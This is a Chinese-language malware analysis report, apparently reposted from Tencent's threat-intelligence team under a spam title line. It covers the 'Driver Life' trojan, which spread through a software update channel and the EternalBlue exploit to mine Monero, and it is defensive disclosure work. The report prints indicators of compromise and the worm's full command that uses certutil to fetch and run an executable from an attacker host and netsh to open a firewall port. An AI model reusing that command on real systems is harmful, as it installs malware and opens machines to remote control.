99最新国产精品精品视频,欧美综合天天夜夜久久

騰訊安全御見(jiàn)威脅情報(bào)中心監(jiān)測(cè)發(fā)現(xiàn)，一款通過(guò)“驅(qū)動(dòng)人生”升級(jí)通道，并同時(shí)利用“永恒之藍(lán)”高危漏洞傳播的木馬突然爆發(fā)，僅2個(gè)小時(shí)受攻擊用戶就高達(dá)10萬(wàn)。“驅(qū)動(dòng)人生”木馬會(huì)利用高危漏洞在企業(yè)內(nèi)網(wǎng)呈蠕蟲(chóng)式傳播，并進(jìn)一步下載云控木馬，在中毒電腦進(jìn)行門羅幣挖礦。

一、概述

12月14日下午，騰訊安全御見(jiàn)威脅情報(bào)中心監(jiān)測(cè)發(fā)現(xiàn)，一款通過(guò)“驅(qū)動(dòng)人生”升級(jí)通道，并同時(shí)利用“永恒之藍(lán)”高危漏洞傳播的木馬突然爆發(fā)，僅2個(gè)小時(shí)受攻擊用戶就高達(dá)10萬(wàn)。

“驅(qū)動(dòng)人生”木馬會(huì)利用高危漏洞在企業(yè)內(nèi)網(wǎng)呈蠕蟲(chóng)式傳播，并進(jìn)一步下載云控木馬，在中毒電腦上進(jìn)行門羅幣挖礦。云控木馬對(duì)企業(yè)信息安全威脅巨大，企業(yè)用戶須重點(diǎn)關(guān)注。

該病毒爆發(fā)剛好是周末時(shí)間，令企業(yè)網(wǎng)管猝不及防，周一工作日員工電腦開(kāi)機(jī)后，建議立刻查殺病毒，再使用殺毒軟件的漏洞修復(fù)功能安裝系統(tǒng)補(bǔ)丁。個(gè)人電腦用戶使用騰訊電腦管家即可防御。

本次病毒爆發(fā)有三個(gè)特點(diǎn)：

1.驅(qū)動(dòng)人生升級(jí)通道傳播的病毒會(huì)在中毒電腦安裝云控木馬;

2.病毒會(huì)利用永恒之藍(lán)漏洞在局域網(wǎng)內(nèi)主動(dòng)擴(kuò)散;

3.通過(guò)云端控制收集中毒電腦部分信息，接受云端指令在中毒電腦進(jìn)行門羅幣挖礦。

“驅(qū)動(dòng)人生”木馬詳細(xì)分析報(bào)告 2小時(shí)感染10萬(wàn)臺(tái)電腦挖門羅幣

木馬攻擊流程圖

二、詳細(xì)分析

dtlupg.exe訪問(wèn)以下url下載病毒

hxxp://xxxx.update.ackng.com/ziptool/pullexecute/f79cb9d2893b254cc75dfb7f3e454a69.exe

hxxp://xxxx.update.ackng.com/calendar/pullexecute/f79cb9d2893b254cc75dfb7f3e454a69.exe

(注意，為避免網(wǎng)友點(diǎn)擊以上鏈接可以直接下載病毒程序，對(duì)部分字符做了隱藏處理)

病毒文件釋放在：

C:Program Files (x86)DTLSoftriliUpdaterctrlf

f79cb9d2893b254cc75dfb7f3e454a69.exe等位置執(zhí)行。

f79cb9d2893b254cc75dfb7f3e454a69.exe 運(yùn)行后最終釋放出 C:WINDOWSTempsvvhost.exe

(MD5：

2E9710A4B9CBA3CD11E977AF87570E3B)運(yùn)行，svvhost.exe打包了“永恒之藍(lán)”等漏洞攻擊工具在內(nèi)外網(wǎng)進(jìn)一步擴(kuò)散。

2.1 病毒母體

F79CB9D2893B254CC75DFB7F3E454A69.exe

運(yùn)行后將自身拷貝到C:windowssystem32svhost.exe，安裝為服務(wù)并啟動(dòng)，服務(wù)名為Ddiver，并在隨后拉起云控模塊svhhost.exe、攻擊模塊svvhost.exe。

運(yùn)行時(shí)先檢測(cè)互斥體，確定是否已感染過(guò)。

通過(guò)檢測(cè)以下進(jìn)程將殺軟信息搜集準(zhǔn)備上傳。

檢測(cè)到任務(wù)管理器及游戲進(jìn)程則將云控模塊svhhost.exe退出。

打開(kāi)互斥體，對(duì)象名稱為”I am tHe xmr reporter” ，xmr意指xmrig.exe礦機(jī)。

搜集系統(tǒng)敏感信息上傳到hxxp://i.haqo.net/i.png,并接受返回的云控代碼等待執(zhí)行。

母體設(shè)置進(jìn)程共享內(nèi)存HSKALWOEDJSLALQEOD

2.2 挖礦

云控木馬svhhost.exe其主要功能是，從母體進(jìn)程svhost.exe共享內(nèi)存中讀取shellcode解密并執(zhí)行，每隔2000秒讀取一次共享內(nèi)存中的shellcode進(jìn)行解密執(zhí)行，共享內(nèi)存名為HSKALWOEDJSLALQEOD，目前該shellcode主要功能挖礦,不排除后期會(huì)拉取其他更加惡意如加密勒索等木馬病毒執(zhí)行

云控木馬執(zhí)行流程

云控木馬運(yùn)行后會(huì)創(chuàng)建一個(gè)線程，該線程函數(shù)主要功能是判斷進(jìn)程svhost.exe(母體進(jìn)程)是否存在，不存在的話則啟動(dòng)該進(jìn)程，接下來(lái)要讀取的共享內(nèi)存數(shù)據(jù)就是從該進(jìn)程進(jìn)行讀取

創(chuàng)建線程判斷母體進(jìn)程是否存在

調(diào)用OpenFileMappingA打開(kāi)共享內(nèi)存，讀取共享內(nèi)存數(shù)據(jù)

讀取共享內(nèi)存數(shù)據(jù)

調(diào)用RtlDecompressBuffer函數(shù)解壓共享內(nèi)存中的數(shù)據(jù)，為下一步執(zhí)行做準(zhǔn)備

解壓共享內(nèi)存數(shù)據(jù)

共享內(nèi)存數(shù)據(jù)加壓完后會(huì)執(zhí)行，目前該shellcode主要功能挖礦,不排除后期會(huì)拉取其他更加惡意如加密勒索等木馬病毒執(zhí)行

執(zhí)行shellcode

嘗試挖礦時(shí)通信IP為172.105.204.237

2.3 攻擊模塊

攻擊模塊從地址

hxxp://dl.haqo.net/eb.exez下載，作為子進(jìn)程Svvhost.Exe啟動(dòng)，分析發(fā)現(xiàn)該文件是通過(guò)python實(shí)現(xiàn)的“永恒之藍(lán)”漏洞利用模塊壓縮打包程序。

子進(jìn)程Svvhost.Exe為將python實(shí)現(xiàn)的“永恒之藍(lán)”漏洞利用模塊壓縮打包程序。

Mysmb.pyo為攻擊時(shí)掃描代碼。

GitHub上也可以看到相關(guān)開(kāi)源代碼

掃描內(nèi)網(wǎng)445端口進(jìn)行攻擊

不僅攻擊內(nèi)網(wǎng)漏洞機(jī)器，還隨機(jī)找?guī)讉€(gè)外網(wǎng)IP嘗試攻擊，1次攻擊完后沉默20分鐘

攻擊成功后paylaod在中招機(jī)器執(zhí)行以下命令進(jìn)行內(nèi)網(wǎng)擴(kuò)散傳播

cmd.exe /c certutil -urlcache -split -f http://dl.haqo.net/dl.exe c:/install.exe&c:/install.exe&netsh firewall add portopening tcp 65531 DNS&netsh interface portproxy add v4tov4 listenport=65531 connectaddress=1.1.1.1 connectport=53

安全建議

1. 服務(wù)器暫時(shí)關(guān)閉不必要的端口(如135、139、445)，方法可參考：

https://guanjia.qq.com/web_clinic/s8/585.html

2. 企業(yè)用戶在周一上班后，建議使用騰訊御點(diǎn)查殺病毒(個(gè)人用戶可使用騰訊電腦管家)，然后使用漏洞修復(fù)功能，修復(fù)全網(wǎng)終端存在的系統(tǒng)高危漏洞;

3. 服務(wù)器使用高強(qiáng)度密碼，切勿使用弱口令，防止黑客暴力破解;

4. 使用殺毒軟件攔截可能的病毒攻擊;

5. 推薦企業(yè)用戶部署騰訊御界高級(jí)威脅檢測(cè)系統(tǒng)防御可能的黑客攻擊。御界高級(jí)威脅檢測(cè)系統(tǒng)，是基于騰訊反病毒實(shí)驗(yàn)室的安全能力、依托騰訊在云和端的海量數(shù)據(jù)，研發(fā)出的獨(dú)特威脅情報(bào)和惡意檢測(cè)模型系統(tǒng)。